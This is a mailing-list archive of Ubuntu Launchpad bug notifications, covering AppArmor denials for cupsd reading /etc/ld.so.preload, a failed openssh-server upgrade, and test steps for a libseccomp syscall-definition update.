dmi:bvnLENOVO:bvr8DET56WW(1.26):bd12/01/2011:svnLENOVO:pn4298R86:pvrThinkPadX220Tablet:rvnLENOVO:rn4298R86:rvrNotAvailable:cvnLENOVO:ct10:cvrNotAvailable:
  dmi.product.name: 4298R86
  dmi.product.version: ThinkPad X220 Tablet
  dmi.sys.vendor: LENOVO
  modified.conffile..etc.default.cups:
   # Cups configure options
   
   # LOAD_LP_MODULE: enable/disable to load "lp" parallel printer driver module
   # LOAD_LP_MODULE has migrated to /etc/modules-load.d/cups-filters.conf
   # LOAD_LP_MODULE=yes
  mtime.conffile..etc.default.cups: 2014-03-12T15:11:15.740184

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1571531/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

[Seth Arnold]

Hello Edson,

Are all those messages after adding this rule to your abstractions/base?

unix (connect, send, receive)
peer=(addr="@2F746D702F65736574732E736F636B00*"),

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1571531

Title:
  cupsd cause apparmor denials for /etc/ld.so.preload

Status in apparmor package in Ubuntu:
  New

Bug description:
  There is a constant flood of messages in dmesg:

  [ 4431.638163] audit: type=1400 audit(1460962510.272:60): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10559 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661208] audit: type=1400 audit(1460962510.296:61): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661390] audit: type=1400 audit(1460962510.296:62): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661759] audit: type=1400 audit(1460962510.296:63): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.661936] audit: type=1400 audit(1460962510.296:64): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661937] audit: type=1400 audit(1460962510.296:65): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.662534] audit: type=1400 audit(1460962510.296:66): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 5081.410342] audit: type=1400 audit(1460963160.033:67): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10810 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 5081.446507] audit: type=1400 audit(1460963160.069:68): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10815 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: cups-daemon 2.1.3-4
  ProcVersionSignature: Ubuntu 4.4.0-18.34-generic 4.4.6
  Uname: Linux 4.4.0-18-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  CupsErrorLog:
   
  CurrentDesktop: X-Cinnamon
  Date: Mon Apr 18 10:56:37 2016
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2013-07-19 (1003 days ago)
  InstallationMedia: Xubuntu 13.04 "Raring Ringtail" - Release i386 (20130423.1)
  Lpstat: device for Generic-PCL-5e: socket://192.168.1.100:9100
  MachineType: LENOVO 4298R86
  Papersize: a4
  PpdFiles: Error: command ['fgrep', '-H', '*NickName', 
'/etc/cups/ppd/Generic-PCL-5e.ppd'] failed with exit code 2: grep: 
/etc/cups/ppd/Generic-PCL-5e.ppd: Permission denied
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.4.0-18-generic 
root=UUID=3d4ce850-6e8a-4cf5-9b82-fb135c22fe1e ro
  SourcePackage: cups
  UpgradeStatus: Upgraded to xenial on 2015-10-29 (171 days ago)
  dmi.bios.date: 12/01/2011
  dmi.bios.vendor: LENOVO
  dmi.bios.version: 8DET56WW (1.26 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 4298R86
  dmi.board.vendor: LENOVO
  dmi.board.version: Not Available
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Not Available
  dmi.modalias: 
dmi:bvnLENOVO:bvr8DET56WW(1.26):bd12/01/2011:svnLENOVO:pn4298R86:pvrThinkPadX220Tablet:rvnLENOVO:rn4298R86:rvrNotAvailable:cvnLENOVO:ct10:cvrNotAvailable:
  dmi.product.name: 4298R86
  dmi.product.version: ThinkPad X220 Tablet
  dmi.sys.vendor: LENOVO
  modified.conffile..etc.default.cups:
   # Cups configure options
   
   # LOAD_LP_MODULE: enable/disable to load "lp" parallel printer driver module
   # LOAD_LP_MODULE has migrated to /etc/modules-load.d/cups-filters.conf
   # LOAD_LP_MODULE=yes
  mtime.conffile..etc.default.cups: 2014-03-12T15:11:15.740184

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1571531/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

[Seth Arnold]

Hello Edson, thanks for the reply; can you re-run this command and paste
back the results?

dmesg | grep DENIED

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1571531

Title:
  cupsd cause apparmor denials for /etc/ld.so.preload

Status in apparmor package in Ubuntu:
  New

Bug description:
  There is a constant flood of messages in dmesg:

  [ 4431.638163] audit: type=1400 audit(1460962510.272:60): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10559 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661208] audit: type=1400 audit(1460962510.296:61): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661390] audit: type=1400 audit(1460962510.296:62): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661759] audit: type=1400 audit(1460962510.296:63): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.661936] audit: type=1400 audit(1460962510.296:64): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661937] audit: type=1400 audit(1460962510.296:65): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.662534] audit: type=1400 audit(1460962510.296:66): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 5081.410342] audit: type=1400 audit(1460963160.033:67): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10810 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 5081.446507] audit: type=1400 audit(1460963160.069:68): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10815 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: cups-daemon 2.1.3-4
  ProcVersionSignature: Ubuntu 4.4.0-18.34-generic 4.4.6
  Uname: Linux 4.4.0-18-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  CupsErrorLog:
   
  CurrentDesktop: X-Cinnamon
  Date: Mon Apr 18 10:56:37 2016
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2013-07-19 (1003 days ago)
  InstallationMedia: Xubuntu 13.04 "Raring Ringtail" - Release i386 (20130423.1)
  Lpstat: device for Generic-PCL-5e: socket://192.168.1.100:9100
  MachineType: LENOVO 4298R86
  Papersize: a4
  PpdFiles: Error: command ['fgrep', '-H', '*NickName', 
'/etc/cups/ppd/Generic-PCL-5e.ppd'] failed with exit code 2: grep: 
/etc/cups/ppd/Generic-PCL-5e.ppd: Permission denied
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.4.0-18-generic 
root=UUID=3d4ce850-6e8a-4cf5-9b82-fb135c22fe1e ro
  SourcePackage: cups
  UpgradeStatus: Upgraded to xenial on 2015-10-29 (171 days ago)
  dmi.bios.date: 12/01/2011
  dmi.bios.vendor: LENOVO
  dmi.bios.version: 8DET56WW (1.26 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 4298R86
  dmi.board.vendor: LENOVO
  dmi.board.version: Not Available
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Not Available
  dmi.modalias: 
dmi:bvnLENOVO:bvr8DET56WW(1.26):bd12/01/2011:svnLENOVO:pn4298R86:pvrThinkPadX220Tablet:rvnLENOVO:rn4298R86:rvrNotAvailable:cvnLENOVO:ct10:cvrNotAvailable:
  dmi.product.name: 4298R86
  dmi.product.version: ThinkPad X220 Tablet
  dmi.sys.vendor: LENOVO
  modified.conffile..etc.default.cups:
   # Cups configure options
   
   # LOAD_LP_MODULE: enable/disable to load "lp" parallel printer driver module
   # LOAD_LP_MODULE has migrated to /etc/modules-load.d/cups-filters.conf
   # LOAD_LP_MODULE=yes
  mtime.conffile..etc.default.cups: 2014-03-12T15:11:15.740184

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1571531/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

[Seth Arnold]

Hello Edson,

Please add these lines to your /etc/apparmor.d/abstractions/base file:

  /etc/opt/eset/  r,
  /etc/opt/eset/** r,
  /opt/eset/esets/lib/** mr,
  unix (connect, send, receive) 
peer=(addr="@2F746D702F65736574732E736F636B00*"),

Then sudo /etc/init.d/apparmor reload
If that appeared to work fine, then reboot.

I expect we'll probably see more once you've done these.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1571531

Title:
  cupsd cause apparmor denials for /etc/ld.so.preload

Status in apparmor package in Ubuntu:
  New

Bug description:
  There is a constant flood of messages in dmesg:

  [ 4431.638163] audit: type=1400 audit(1460962510.272:60): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10559 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661208] audit: type=1400 audit(1460962510.296:61): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661390] audit: type=1400 audit(1460962510.296:62): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661759] audit: type=1400 audit(1460962510.296:63): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.661936] audit: type=1400 audit(1460962510.296:64): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661937] audit: type=1400 audit(1460962510.296:65): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.662534] audit: type=1400 audit(1460962510.296:66): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 5081.410342] audit: type=1400 audit(1460963160.033:67): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10810 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 5081.446507] audit: type=1400 audit(1460963160.069:68): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10815 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: cups-daemon 2.1.3-4
  ProcVersionSignature: Ubuntu 4.4.0-18.34-generic 4.4.6
  Uname: Linux 4.4.0-18-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  CupsErrorLog:
   
  CurrentDesktop: X-Cinnamon
  Date: Mon Apr 18 10:56:37 2016
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2013-07-19 (1003 days ago)
  InstallationMedia: Xubuntu 13.04 "Raring Ringtail" - Release i386 (20130423.1)
  Lpstat: device for Generic-PCL-5e: socket://192.168.1.100:9100
  MachineType: LENOVO 4298R86
  Papersize: a4
  PpdFiles: Error: command ['fgrep', '-H', '*NickName', 
'/etc/cups/ppd/Generic-PCL-5e.ppd'] failed with exit code 2: grep: 
/etc/cups/ppd/Generic-PCL-5e.ppd: Permission denied
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.4.0-18-generic 
root=UUID=3d4ce850-6e8a-4cf5-9b82-fb135c22fe1e ro
  SourcePackage: cups
  UpgradeStatus: Upgraded to xenial on 2015-10-29 (171 days ago)
  dmi.bios.date: 12/01/2011
  dmi.bios.vendor: LENOVO
  dmi.bios.version: 8DET56WW (1.26 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 4298R86
  dmi.board.vendor: LENOVO
  dmi.board.version: Not Available
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Not Available
  dmi.modalias: 
dmi:bvnLENOVO:bvr8DET56WW(1.26):bd12/01/2011:svnLENOVO:pn4298R86:pvrThinkPadX220Tablet:rvnLENOVO:rn4298R86:rvrNotAvailable:cvnLENOVO:ct10:cvrNotAvailable:
  dmi.product.name: 4298R86
  dmi.product.version: ThinkPad X220 Tablet
  dmi.sys.vendor: LENOVO
  modified.conffile..etc.default.cups:
   # Cups configure options
   
   # LOAD_LP_MODULE: enable/disable to load "lp" parallel printer driver module
   # LOAD_LP_MODULE has migrated to /etc/modules-load.d/cups-filters.conf
   # LOAD_LP_MODULE=yes
  mtime.conffile..etc.default.cups: 2014-03-12T15:11:15.740184

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1571531/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

[Seth Arnold]

Hello Edson, what's the output of:

dmesg | grep DENIED

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1571531

Title:
  cupsd cause apparmor denials for /etc/ld.so.preload

Status in apparmor package in Ubuntu:
  New

Bug description:
  There is a constant flood of messages in dmesg:

  [ 4431.638163] audit: type=1400 audit(1460962510.272:60): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10559 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661208] audit: type=1400 audit(1460962510.296:61): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661390] audit: type=1400 audit(1460962510.296:62): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661759] audit: type=1400 audit(1460962510.296:63): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.661936] audit: type=1400 audit(1460962510.296:64): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661937] audit: type=1400 audit(1460962510.296:65): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.662534] audit: type=1400 audit(1460962510.296:66): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 5081.410342] audit: type=1400 audit(1460963160.033:67): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10810 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 5081.446507] audit: type=1400 audit(1460963160.069:68): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10815 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: cups-daemon 2.1.3-4
  ProcVersionSignature: Ubuntu 4.4.0-18.34-generic 4.4.6
  Uname: Linux 4.4.0-18-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  CupsErrorLog:
   
  CurrentDesktop: X-Cinnamon
  Date: Mon Apr 18 10:56:37 2016
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2013-07-19 (1003 days ago)
  InstallationMedia: Xubuntu 13.04 "Raring Ringtail" - Release i386 (20130423.1)
  Lpstat: device for Generic-PCL-5e: socket://192.168.1.100:9100
  MachineType: LENOVO 4298R86
  Papersize: a4
  PpdFiles: Error: command ['fgrep', '-H', '*NickName', 
'/etc/cups/ppd/Generic-PCL-5e.ppd'] failed with exit code 2: grep: 
/etc/cups/ppd/Generic-PCL-5e.ppd: Permission denied
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.4.0-18-generic 
root=UUID=3d4ce850-6e8a-4cf5-9b82-fb135c22fe1e ro
  SourcePackage: cups
  UpgradeStatus: Upgraded to xenial on 2015-10-29 (171 days ago)
  dmi.bios.date: 12/01/2011
  dmi.bios.vendor: LENOVO
  dmi.bios.version: 8DET56WW (1.26 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 4298R86
  dmi.board.vendor: LENOVO
  dmi.board.version: Not Available
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Not Available
  dmi.modalias: 
dmi:bvnLENOVO:bvr8DET56WW(1.26):bd12/01/2011:svnLENOVO:pn4298R86:pvrThinkPadX220Tablet:rvnLENOVO:rn4298R86:rvrNotAvailable:cvnLENOVO:ct10:cvrNotAvailable:
  dmi.product.name: 4298R86
  dmi.product.version: ThinkPad X220 Tablet
  dmi.sys.vendor: LENOVO
  modified.conffile..etc.default.cups:
   # Cups configure options
   
   # LOAD_LP_MODULE: enable/disable to load "lp" parallel printer driver module
   # LOAD_LP_MODULE has migrated to /etc/modules-load.d/cups-filters.conf
   # LOAD_LP_MODULE=yes
  mtime.conffile..etc.default.cups: 2014-03-12T15:11:15.740184

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1571531/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1816016] Re: package openssh-server 1:7.2p2-4ubuntu2.7 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1

[Seth Arnold]

This message in your logs indicates that your system is improperly
configured:

WARN: uid is 0 but '/' is owned by 1000

I suggest heading to #ubuntu on irc.freenode.net or
https://askubuntu.com to ask for help from someone. If you go to
askubuntu, be sure to paste in the output of ls -l / .

Thanks

** Changed in: openssh (Ubuntu)
   Status: New => Invalid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1816016

Title:
  package openssh-server 1:7.2p2-4ubuntu2.7 failed to install/upgrade:
  subprocess installed post-installation script returned error exit
  status 1

Status in openssh package in Ubuntu:
  Invalid

Bug description:
  Ubuntu 16.04.5 LTS

  ProblemType: Package
  DistroRelease: Ubuntu 16.04
  Package: openssh-server 1:7.2p2-4ubuntu2.7
  ProcVersionSignature: Ubuntu 4.4.0-133.159-generic 4.4.134
  Uname: Linux 4.4.0-133-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2.18
  Architecture: amd64
  Date: Fri Feb 15 09:37:58 2019
  ErrorMessage: subprocess installed post-installation script returned error 
exit status 1
  InstallationDate: Installed on 2014-08-15 (1644 days ago)
  InstallationMedia: Ubuntu 14.04.1 LTS "Trusty Tahr" - Release amd64 
(20140722.2)
  RelatedPackageVersions:
   dpkg 1.18.4ubuntu1.5
   apt  1.2.29ubuntu0.1
  SSHDConfig: Error: command ['/usr/sbin/sshd', '-T'] failed with exit code 
255: Missing privilege separation directory: /var/run/sshd
  SourcePackage: openssh
  Title: package openssh-server 1:7.2p2-4ubuntu2.7 failed to install/upgrade: 
subprocess installed post-installation script returned error exit status 1
  UpgradeStatus: Upgraded to xenial on 2018-09-16 (151 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1816016/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1815415] Re: please update libseccomp for newer kernel syscalls

[Seth Arnold]

Thanks Christian, very thorough.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libseccomp in Ubuntu.
https://bugs.launchpad.net/bugs/1815415

Title:
  please update libseccomp for newer kernel syscalls

Status in libseccomp package in Ubuntu:
  Fix Released
Status in libseccomp source package in Bionic:
  In Progress
Status in libseccomp source package in Cosmic:
  Fix Released

Bug description:
  [Impact]

   * The libseccomp library provides an easy to use, platform independent,
     interface to the Linux Kernel's syscall filtering mechanism. But it can
     only "control" those syscalls it knows about. Therefore staying up to
     date with newer kernels is a requirement to be fully funcitonal.

   * At the time 18.04 was released with the 4.15 kernel the new definitions
     were not yet released for libseccomp - lets fix this mismatch by
     backporting the new syscall definitions [2][3][4].

  [Test Case]

   * Note: a lot of this is kernel dependent it should work with the
  intended SRU target of Bionic with kernel 4.15 or 4.18, but be careful
  to run it there (e.g. not a LXD container on Xenials 4.4 kernel)

   * we modify the already existing autopkgtest for this SRU
  verification

  # Prep
  $ apt install ubuntu-dev-tools build-essential linux-libc-dev libseccomp-dev 
libseccomp2 seccomp
  $ pull-lp-source libseccomp bionic
  $ cd libseccomp-2.3.1
  $ export ADTTMP=$(mktemp -d); echo $ADTTMP
  # run original tests as-is (should pass/fail as expected)
  $ ./debian/tests/test-filter
  # add new syscalls of this SRU
  $ cp debian/tests/data/safe.filter debian/tests/data/newcodes.filter
  $ printf 
"preadv2\npwritev2\npkey_mprotect\npkey_alloc\npkey_free\nget_tls\ns390_guarded_storage\ns390_sthyi\n"
 >> debian/tests/data/newcodes.filter
  # remove unknown calls (x86 4.18 kernel)
  sed -i -e '/^_exit$/d' -e '/^fstatvfs$/d' -e '/^llseek$/d' -e '/^pread$/d' -e 
'/^pselect$/d' -e '/^pwrite$/d' -e '/^sigtimedwait$/d' -e '/^sigwaitinfo$/d' -e 
'/^statvfs$/d' debian/tests/data/newcodes.filter
  # make unknown call a fail
  $ sed -i -e '111s/continue;/{fprintf(stderr, "failed to find %s\\n",buf);rc = 
-1;goto out;}/' debian/tests/src/test-seccomp.c
  # run this special test and check return value
  ${ADTTMP}/exe ./debian/tests/data/newcodes.filter /bin/date; echo $?

  Without the fix it will fail like:
  DEBUG: seccomp_load_filters ./debian/tests/data/newcodes.filter
  failed to find preadv2
  seccomp_load_filters failed with -1
  1

  But with the fix applied those new calls will work:
  DEBUG: seccomp_load_filters ./debian/tests/data/newcodes.filter
  Tue Feb 12 07:41:05 UTC 2019
  0

  
  [Regression Potential]

   * This isn't adding new active code like functions, but only extending
     the definitions of per-arch syscall numbers to be aware of the newer
     syscalls that were added in the kernel. Therefore no old use-cases
     should regress (they are not touched). The only change in behavior for
     an SRU POV would be that things that got denied so far (e.g. if you
     tried to set such a new syscall through libseccomp) was denied before
     and would now work. I think that is exactly the intention of the SRU
     and not a regression.

  [Other Info]

   * Requested while security reviewing an libseccomp SRU to have one update
     for both [1].
   * we also missed the former update for kernel 4.9 [3] AND 4.10 [4] as the
     official releases of the lib are rather seldom.
   * In general there already are build time tests and autopkgtests in the 
 package already. So coverage of "old calls" for regressions is already 
 good.

  ---

  This came up while working on bug 1755250 which asked for statx.
  But on the review of that it was pointed out [1] that it would be great to 
support further new kernel syscall defines - this isn't even looking at HWE 
kernels for Bionic, but "just" adding those which are there for the 4.15 kernel 
Bionic was released with.
  With the HWE kernels in mind there would be even more one might want to add, 
but there is no newer such update in the upstream repo yet.

  [1]: 
https://code.launchpad.net/~paelzer/ubuntu/+source/libseccomp/+git/libseccomp/+merge/362906/comments/944418
  [2]: 
https://github.com/seccomp/libseccomp/commit/c842c2f6c203ad9da37ca60219172aa0be68d26a
  [3]: 
https://github.com/seccomp/libseccomp/commit/d9102f12fd39bd77151a1f630fcfc8c80f86c55c
  [4]: 
https://github.com/seccomp/libseccomp/commit/116b3c1a2e1db53cc35b74f30c080f5265faa674

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libseccomp/+bug/1815415/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

Re: [Touch-packages] [Bug 1815415] Re: please update libseccomp for newer kernel syscalls

[Seth Arnold]

On Mon, Feb 11, 2019 at 07:38:28AM -, Christian Ehrhardt  wrote:
> @Seth / @Tyler - Hi, you asked for the change, but I'd want to ask for
> something as well :-) Do you have any testcases from your security work
> that we could reuse here to check the SRU for SRU verification?

It doesn't look we do; we've got some kernel-level seccomp filter checks
in place for testing the kernel, but these use prctl(2) directly.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libseccomp in Ubuntu.
https://bugs.launchpad.net/bugs/1815415

Title:
  please update libseccomp for newer kernel syscalls

Status in libseccomp package in Ubuntu:
  Fix Released
Status in libseccomp source package in Bionic:
  Triaged
Status in libseccomp source package in Cosmic:
  Fix Released

Bug description:
  [Impact]

   * The libseccomp library provides an easy to use, platform independent,
     interface to the Linux Kernel's syscall filtering mechanism. But it can
     only "control" those syscalls it knows about. Therefore staying up to
     date with newer kernels is a requirement to be fully funcitonal.

   * At the time 18.04 was released with the 4.15 kernel the new definitions
     were not yet released for libseccomp - lets fix this mismatch by
     backporting the new syscall definitions [2][3][4].

  [Test Case]

   * TODO

  [Regression Potential]

   * This isn't adding new active code like functions, but only extending
     the definitions of per-arch syscall numbers to be aware of the newer
     syscalls that were added in the kernel. Therefore no old use-cases
     should regress (they are not touched). The only change in behavior for
     an SRU POV would be that things that got denied so far (e.g. if you
     tried to set such a new syscall through libseccomp) was denied before
